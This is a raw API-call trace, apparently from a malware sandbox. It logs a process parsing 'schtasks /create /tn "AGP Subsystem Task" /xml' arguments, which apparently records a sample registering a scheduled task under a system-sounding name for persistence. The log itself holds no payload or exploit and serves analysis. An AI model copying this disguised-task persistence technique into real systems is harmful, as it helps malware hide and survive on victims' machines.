[0170.442] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|du|") returned 4
[0170.443] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.443] lstrlenW (lpString="|du|") returned 4
[0170.443] lstrlenW (lpString="|f|") returned 3
[0170.443] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0
[0170.443] SetLastError (dwErrCode=0x490)
[0170.443] lstrlenW (lpString="ri") returned 2
[0170.443] lstrlenW (lpString="ri") returned 2
[0170.443] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] lstrlenW (lpString="f") returned 1
[0170.443] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ri|") returned 4
[0170.443] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.443] lstrlenW (lpString="|ri|") returned 4
[0170.443] lstrlenW (lpString="|f|") returned 3
[0170.443] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0
[0170.443] SetLastError (dwErrCode=0x490)
[0170.443] lstrlenW (lpString="z") returned 1
[0170.443] lstrlenW (lpString="z") returned 1
[0170.443] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] lstrlenW (lpString="f") returned 1
[0170.443] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.443] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|z|") returned 3
[0170.444] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.444] lstrlenW (lpString="|z|") returned 3
[0170.444] lstrlenW (lpString="|f|") returned 3
[0170.444] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0
[0170.444] SetLastError (dwErrCode=0x490)
[0170.444] lstrlenW (lpString="f") returned 1
[0170.444] lstrlenW (lpString="f") returned 1
[0170.444] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] lstrlenW (lpString="f") returned 1
[0170.444] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.444] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|f|") returned 3
[0170.444] lstrlenW (lpString="|f|") returned 3
[0170.444] lstrlenW (lpString="|f|") returned 3
[0170.444] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0170.444] SetLastError (dwErrCode=0x0)
[0170.444] SetLastError (dwErrCode=0x0)
[0170.444] SetLastError (dwErrCode=0x0)
[0170.444] lstrlenW (lpString="/tn") returned 3
[0170.444] lstrlenW (lpString="-/") returned 2
[0170.444] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.444] lstrlenW (lpString="create") returned 6
[0170.444] lstrlenW (lpString="create") returned 6
[0170.444] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] lstrlenW (lpString="tn") returned 2
[0170.444] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.444] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.445] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.445] lstrlenW (lpString="|create|") returned 8
[0170.445] lstrlenW (lpString="|tn|") returned 4
[0170.445] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0170.445] SetLastError (dwErrCode=0x490)
[0170.445] lstrlenW (lpString="?") returned 1
[0170.445] lstrlenW (lpString="?") returned 1
[0170.445] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] lstrlenW (lpString="tn") returned 2
[0170.445] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|?|") returned 3
[0170.445] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.445] lstrlenW (lpString="|?|") returned 3
[0170.445] lstrlenW (lpString="|tn|") returned 4
[0170.445] SetLastError (dwErrCode=0x490)
[0170.445] lstrlenW (lpString="s") returned 1
[0170.445] lstrlenW (lpString="s") returned 1
[0170.445] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] lstrlenW (lpString="tn") returned 2
[0170.445] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.445] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|s|") returned 3
[0170.445] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.445] lstrlenW (lpString="|s|") returned 3
[0170.445] lstrlenW (lpString="|tn|") returned 4
[0170.445] SetLastError (dwErrCode=0x490)
[0170.445] lstrlenW (lpString="u") returned 1
[0170.446] lstrlenW (lpString="u") returned 1
[0170.446] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] lstrlenW (lpString="tn") returned 2
[0170.446] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|u|") returned 3
[0170.446] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.446] lstrlenW (lpString="|u|") returned 3
[0170.446] lstrlenW (lpString="|tn|") returned 4
[0170.446] SetLastError (dwErrCode=0x490)
[0170.446] lstrlenW (lpString="p") returned 1
[0170.446] lstrlenW (lpString="p") returned 1
[0170.446] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] lstrlenW (lpString="tn") returned 2
[0170.446] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|p|") returned 3
[0170.446] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.446] lstrlenW (lpString="|p|") returned 3
[0170.446] lstrlenW (lpString="|tn|") returned 4
[0170.446] SetLastError (dwErrCode=0x490)
[0170.446] lstrlenW (lpString="ru") returned 2
[0170.446] lstrlenW (lpString="ru") returned 2
[0170.446] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] lstrlenW (lpString="tn") returned 2
[0170.446] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.446] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ru|") returned 4
[0170.446] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.446] lstrlenW (lpString="|ru|") returned 4
[0170.447] lstrlenW (lpString="|tn|") returned 4
[0170.447] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0
[0170.447] SetLastError (dwErrCode=0x490)
[0170.447] lstrlenW (lpString="rp") returned 2
[0170.447] lstrlenW (lpString="rp") returned 2
[0170.447] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] lstrlenW (lpString="tn") returned 2
[0170.447] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|rp|") returned 4
[0170.447] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.447] lstrlenW (lpString="|rp|") returned 4
[0170.447] lstrlenW (lpString="|tn|") returned 4
[0170.447] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0
[0170.447] SetLastError (dwErrCode=0x490)
[0170.447] lstrlenW (lpString="sc") returned 2
[0170.447] lstrlenW (lpString="sc") returned 2
[0170.447] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] lstrlenW (lpString="tn") returned 2
[0170.447] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.447] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sc|") returned 4
[0170.447] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.447] lstrlenW (lpString="|sc|") returned 4
[0170.447] lstrlenW (lpString="|tn|") returned 4
[0170.447] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0
[0170.447] SetLastError (dwErrCode=0x490)
[0170.448] lstrlenW (lpString="mo") returned 2
[0170.448] lstrlenW (lpString="mo") returned 2
[0170.448] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] lstrlenW (lpString="tn") returned 2
[0170.448] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|mo|") returned 4
[0170.448] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.448] lstrlenW (lpString="|mo|") returned 4
[0170.448] lstrlenW (lpString="|tn|") returned 4
[0170.448] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0
[0170.448] SetLastError (dwErrCode=0x490)
[0170.448] lstrlenW (lpString="d") returned 1
[0170.448] lstrlenW (lpString="d") returned 1
[0170.448] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] lstrlenW (lpString="tn") returned 2
[0170.448] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.448] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|d|") returned 3
[0170.448] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.448] lstrlenW (lpString="|d|") returned 3
[0170.448] lstrlenW (lpString="|tn|") returned 4
[0170.448] SetLastError (dwErrCode=0x490)
[0170.448] lstrlenW (lpString="m") returned 1
[0170.449] lstrlenW (lpString="m") returned 1
[0170.449] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|m|") returned 3
[0170.449] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.449] lstrlenW (lpString="|m|") returned 3
[0170.449] lstrlenW (lpString="|tn|") returned 4
[0170.449] SetLastError (dwErrCode=0x490)
[0170.449] lstrlenW (lpString="i") returned 1
[0170.449] lstrlenW (lpString="i") returned 1
[0170.449] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|i|") returned 3
[0170.449] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.449] lstrlenW (lpString="|i|") returned 3
[0170.449] lstrlenW (lpString="|tn|") returned 4
[0170.449] SetLastError (dwErrCode=0x490)
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] lstrlenW (lpString="tn") returned 2
[0170.449] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.449] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.450] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.450] lstrlenW (lpString="|tn|") returned 4
[0170.450] lstrlenW (lpString="|tn|") returned 4
[0170.450] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|"
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.450] lstrlenW (lpString="-/") returned 2
[0170.450] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0170.450] SetLastError (dwErrCode=0x490)
[0170.450] SetLastError (dwErrCode=0x490)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.450] StrChrIW (lpStart="AGP Subsystem Task", wMatch=0x3a) returned 0x0
[0170.450] SetLastError (dwErrCode=0x490)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="AGP Subsystem Task") returned 18
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] SetLastError (dwErrCode=0x0)
[0170.450] lstrlenW (lpString="/xml") returned 4
[0170.450] lstrlenW (lpString="-/") returned 2
[0170.450] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.450] lstrlenW (lpString="create") returned 6
[0170.450] lstrlenW (lpString="create") returned 6
[0170.450] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.450] lstrlenW (lpString="xml") returned 3
[0170.451] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.451] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|create|") returned 8
[0170.451] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.451] lstrlenW (lpString="|create|") returned 8
[0170.451] lstrlenW (lpString="|xml|") returned 5
[0170.451] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0170.451] SetLastError (dwErrCode=0x490)
[0170.451] lstrlenW (lpString="?") returned 1
[0170.451] lstrlenW (lpString="?") returned 1
[0170.451] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.451] lstrlenW (lpString="xml") returned 3
[0170.451] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.451] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|?|") returned 3
[0170.451] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.451] lstrlenW (lpString="|?|") returned 3
[0170.451] lstrlenW (lpString="|xml|") returned 5
[0170.451] SetLastError (dwErrCode=0x490)
[0170.451] lstrlenW (lpString="s") returned 1
[0170.451] lstrlenW (lpString="s") returned 1
[0170.451] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] lstrlenW (lpString="xml") returned 3
[0170.452] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|s|") returned 3
[0170.452] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.452] lstrlenW (lpString="|s|") returned 3
[0170.452] lstrlenW (lpString="|xml|") returned 5
[0170.452] SetLastError (dwErrCode=0x490)
[0170.452] lstrlenW (lpString="u") returned 1
[0170.452] lstrlenW (lpString="u") returned 1
[0170.452] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] lstrlenW (lpString="xml") returned 3
[0170.452] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|u|") returned 3
[0170.452] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.452] lstrlenW (lpString="|u|") returned 3
[0170.452] lstrlenW (lpString="|xml|") returned 5
[0170.452] SetLastError (dwErrCode=0x490)
[0170.452] lstrlenW (lpString="p") returned 1
[0170.452] lstrlenW (lpString="p") returned 1
[0170.452] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] lstrlenW (lpString="xml") returned 3
[0170.452] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.452] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|p|") returned 3
[0170.452] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.452] lstrlenW (lpString="|p|") returned 3
[0170.453] lstrlenW (lpString="|xml|") returned 5
[0170.453] SetLastError (dwErrCode=0x490)
[0170.453] lstrlenW (lpString="ru") returned 2
[0170.453] lstrlenW (lpString="ru") returned 2
[0170.453] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] lstrlenW (lpString="xml") returned 3
[0170.453] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|ru|") returned 4
[0170.453] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.453] lstrlenW (lpString="|ru|") returned 4
[0170.453] lstrlenW (lpString="|xml|") returned 5
[0170.453] SetLastError (dwErrCode=0x490)
[0170.453] lstrlenW (lpString="rp") returned 2
[0170.453] lstrlenW (lpString="rp") returned 2
[0170.453] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] lstrlenW (lpString="xml") returned 3
[0170.453] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.453] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|rp|") returned 4
[0170.453] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.453] lstrlenW (lpString="|rp|") returned 4
[0170.453] lstrlenW (lpString="|xml|") returned 5
[0170.453] SetLastError (dwErrCode=0x490)
[0170.453] lstrlenW (lpString="sc") returned 2
[0170.453] lstrlenW (lpString="sc") returned 2
[0170.454] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] lstrlenW (lpString="xml") returned 3
[0170.454] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sc|") returned 4
[0170.454] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.454] lstrlenW (lpString="|sc|") returned 4
[0170.454] lstrlenW (lpString="|xml|") returned 5
[0170.454] SetLastError (dwErrCode=0x490)
[0170.454] lstrlenW (lpString="mo") returned 2
[0170.454] lstrlenW (lpString="mo") returned 2
[0170.454] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] lstrlenW (lpString="xml") returned 3
[0170.454] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|mo|") returned 4
[0170.454] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.454] lstrlenW (lpString="|mo|") returned 4
[0170.454] lstrlenW (lpString="|xml|") returned 5
[0170.454] SetLastError (dwErrCode=0x490)
[0170.454] lstrlenW (lpString="d") returned 1
[0170.454] lstrlenW (lpString="d") returned 1
[0170.454] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] lstrlenW (lpString="xml") returned 3
[0170.454] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.454] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|d|") returned 3
[0170.454] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.454] lstrlenW (lpString="|d|") returned 3
[0170.454] lstrlenW (lpString="|xml|") returned 5
[0170.455] SetLastError (dwErrCode=0x490)
[0170.455] lstrlenW (lpString="m") returned 1
[0170.455] lstrlenW (lpString="m") returned 1
[0170.455] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] lstrlenW (lpString="xml") returned 3
[0170.455] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|m|") returned 3
[0170.455] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.455] lstrlenW (lpString="|m|") returned 3
[0170.455] lstrlenW (lpString="|xml|") returned 5
[0170.455] SetLastError (dwErrCode=0x490)
[0170.455] lstrlenW (lpString="i") returned 1
[0170.455] lstrlenW (lpString="i") returned 1
[0170.455] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] lstrlenW (lpString="xml") returned 3
[0170.455] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|i|") returned 3
[0170.455] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.455] lstrlenW (lpString="|i|") returned 3
[0170.455] lstrlenW (lpString="|xml|") returned 5
[0170.455] SetLastError (dwErrCode=0x490)
[0170.455] lstrlenW (lpString="tn") returned 2
[0170.455] lstrlenW (lpString="tn") returned 2
[0170.455] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] lstrlenW (lpString="xml") returned 3
[0170.455] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.455] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tn|") returned 4
[0170.456] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.456] lstrlenW (lpString="|tn|") returned 4
[0170.456] lstrlenW (lpString="|xml|") returned 5
[0170.456] SetLastError (dwErrCode=0x490)
[0170.456] lstrlenW (lpString="tr") returned 2
[0170.456] lstrlenW (lpString="tr") returned 2
[0170.456] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] lstrlenW (lpString="xml") returned 3
[0170.456] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|tr|") returned 4
[0170.456] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.456] lstrlenW (lpString="|tr|") returned 4
[0170.456] lstrlenW (lpString="|xml|") returned 5
[0170.456] SetLastError (dwErrCode=0x490)
[0170.456] lstrlenW (lpString="st") returned 2
[0170.456] lstrlenW (lpString="st") returned 2
[0170.456] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] lstrlenW (lpString="xml") returned 3
[0170.456] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|st|") returned 4
[0170.456] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.456] lstrlenW (lpString="|st|") returned 4
[0170.456] lstrlenW (lpString="|xml|") returned 5
[0170.456] SetLastError (dwErrCode=0x490)
[0170.456] lstrlenW (lpString="sd") returned 2
[0170.456] lstrlenW (lpString="sd") returned 2
[0170.456] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.456] lstrlenW (lpString="xml") returned 3
[0170.456] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.457] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0x5, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|sd|") returned 4
[0170.457] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13ce20 | out: _Buffer="|xml|") returned 5
[0170.457] lstrlenW (lpString="|sd|") returned 4
[0170.457] lstrlenW (lpString="|xml|") returned 5
[0170.457] SetLastError (dwErrCode=0x490)
[0170.457] lstrlenW (lpString="ed") returned 2
